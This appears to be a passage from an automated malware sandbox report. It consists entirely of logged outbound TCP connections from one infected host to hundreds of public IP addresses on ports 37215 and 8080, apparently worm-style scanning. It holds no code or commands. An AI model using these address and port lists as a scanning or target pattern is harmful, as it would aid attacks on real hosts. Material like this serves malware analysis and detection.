          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.55.252.119:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.4.146.111:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.145.155.103:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.108.168.234:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.152.135.36:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.124.175.31:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.157.217.33:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.113.213.3:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.96.207.25:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.66.243.101:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.42.237.168:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.9.166.228:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.198.201.208:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.20.140.194:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.42.41.112:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.243.121.220:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.36.126.96:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.6.238.219:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.100.233.243:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.156.68.173:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.167.196.96:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.10.84.72:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.121.191.159:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.82.97.129:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.201.77.220:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.127.127.63:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.108.150.81:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.253.92.230:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.77.98.205:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.195.27.61:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.132.53.72:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.82.88.244:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.224.85.132:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.88.65.80:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.189.252.240:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.19.203.30:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.166.173.251:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.156.180.144:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.172.124.196:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.246.184.230:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.155.30.5:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.125.56.41:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.251.160.44:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.78.37.19:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.8.60.110:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.142.33.38:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.102.153.93:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.192.243.255:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.48.111.196:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.49.238.56:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.238.110.103:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.111.44.182:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.79.231.131:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.247.15.209:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.188.178.134:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.57.103.85:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.94.246.234:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.74.216.101:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.212.96.83:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.240.43.33:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.130.164.199:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.235.111.238:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.235.127.43:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.92.112.234:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.35.25.216:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.114.238.221:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.153.49.251:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.182.112.127:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.84.167.192:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.112.75.217:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.206.128.220:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.4.135.221:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.87.114.58:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.255.193.227:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.106.86.200:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.185.242.116:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.210.66.249:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.255.206.242:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.41.190.248:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.19.123.19:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.87.148.13:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.49.63.141:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.104.191.202:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.208.49.52:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.213.19.185:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.80.23.200:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.127.16.232:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.113.117.1:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.6.25.218:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.25.167.22:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.134.140.136:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.20.44.251:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.29.175.125:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.174.53.48:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.121.77.114:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.58.86.112:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.67.228.78:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.31.150.61:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.175.26.223:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.171.230.0:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.212.106.88:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.62.39.206:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.218.1.160:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.108.194.107:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.177.234.143:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.131.69.136:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.93.93.3:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.167.54.44:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.235.221.143:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.161.100.159:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.132.195.81:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.59.32.147:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.198.113.60:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.235.197.223:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.190.138.195:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.171.205.225:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.166.63.87:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.177.244.214:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.207.66.68:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.73.48.140:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.116.107.37:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.238.51.100:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.13.42.28:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.130.195.134:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.63.124.92:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.39.168.110:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.18.48.70:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.177.93.45:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.96.93.47:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.4.15.38:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.209.43.223:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.246.139.90:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.197.209.222:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.221.116.200:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.78.118.235:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.58.238.139:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.251.197.109:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.58.208.219:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.255.251.222:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.217.165.54:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.198.143.246:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.250.162.183:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.112.30.14:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.70.153.171:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.229.191.157:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.174.172.146:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.125.85.180:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.46.108.117:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.214.68.93:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.171.58.179:37215
          Source: global trafficTCP traffic: 192.168.2.13:48688 -> 197.45.198.82:37215
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.123.87.105:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.198.177.106:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.184.189.238:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.86.50.67:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.104.214.184:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.181.47.43:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.83.177.115:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.104.207.60:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.221.126.139:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.223.28.24:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.148.161.6:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.174.43.114:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.17.70.6:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.53.62.205:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.252.137.34:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.169.254.245:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.113.91.99:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.54.86.105:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.200.213.43:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.79.48.123:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.110.125.66:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.209.104.221:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.186.40.228:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.161.211.163:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.167.30.62:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.154.198.234:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.235.160.187:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.45.17.214:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.189.116.239:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.121.79.170:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.122.146.91:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.89.22.64:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.1.91.212:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.114.78.201:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.253.139.141:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.145.176.245:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.53.129.132:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.122.107.211:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.210.198.96:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.183.120.250:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.193.119.49:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.242.182.134:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.55.111.107:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.0.234.62:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.51.245.41:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.185.92.24:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.81.205.32:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.73.1.125:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.87.208.104:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.7.15.125:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.139.31.196:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.170.84.140:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.243.244.97:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.179.189.134:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.6.139.139:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.205.52.64:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.147.32.231:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.146.135.251:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.252.195.179:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.92.66.66:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.109.106.104:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.23.57.62:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.187.203.139:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.254.24.246:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.252.173.58:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.88.46.78:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.56.155.80:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.219.199.216:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.22.103.126:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.252.236.234:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.204.145.12:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.94.151.117:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.184.184.64:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.220.135.32:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.48.61.58:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.30.156.144:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.52.18.101:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.39.12.21:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.66.112.48:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.235.57.57:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.191.59.75:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.71.128.255:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.235.51.199:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.32.238.244:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.74.73.89:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.60.12.204:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.113.216.45:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.254.151.13:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.142.38.142:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.117.68.243:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.9.57.237:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.85.21.199:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.180.181.118:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.241.242.227:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.110.149.183:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.61.124.53:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.232.176.41:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.77.142.164:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.128.195.49:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.182.235.113:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.248.64.105:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.81.155.252:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.200.32.104:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.109.230.108:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.111.150.82:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.110.208.123:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.88.173.142:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.143.27.52:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.79.133.93:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.155.19.253:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.161.9.153:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.145.49.218:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.18.224.137:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.30.50.199:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.147.189.236:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.134.4.105:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.16.135.91:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.42.15.241:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.163.175.71:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.147.125.123:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.72.147.2:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.160.198.75:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.203.39.114:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.195.155.237:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.73.107.74:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.156.20.188:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.192.100.185:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.157.213.91:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.135.195.100:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.140.119.75:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.26.227.199:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.81.208.183:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.41.177.92:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.86.61.82:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.160.102.4:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.179.153.135:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.169.203.166:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.104.110.58:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.166.62.34:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.168.114.239:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.41.162.218:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.217.69.243:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.183.59.94:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.63.189.155:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.205.236.174:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.104.171.17:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.4.39.223:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.252.67.94:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.74.166.226:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.56.10.56:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.41.22.149:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.99.54.202:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.78.14.56:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.134.19.86:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.101.34.197:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.67.157.201:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.229.205.12:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.212.176.15:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.180.38.188:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.238.106.69:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.60.32.156:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.87.244.44:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.121.213.18:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.224.180.254:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.105.198.120:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.39.99.231:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.108.135.200:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.186.248.168:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.250.36.92:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.108.161.254:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.101.125.235:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.16.82.207:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.161.87.108:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.171.51.155:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.212.37.244:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.138.106.245:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.82.158.231:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.48.33.188:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.98.14.154:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.159.94.202:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.210.173.201:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.16.230.131:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.146.74.243:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.12.118.114:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.243.80.67:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.60.241.80:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.79.32.73:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.190.228.127:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.121.185.102:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.76.236.60:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.216.167.97:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.60.34.224:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.68.25.119:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.189.12.186:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.213.90.82:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.75.27.16:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.29.25.81:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.35.243.141:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.21.142.169:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.48.87.205:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.171.21.228:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.213.32.170:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.185.98.103:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.204.50.175:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.206.22.12:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.254.244.12:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.58.230.9:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.111.51.200:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.120.85.153:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.31.12.203:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.210.73.190:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.178.51.73:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 98.22.161.144:8080
          Source: global trafficTCP traffic: 192.168.2.13:49712 -> 184.125.172.213:8080
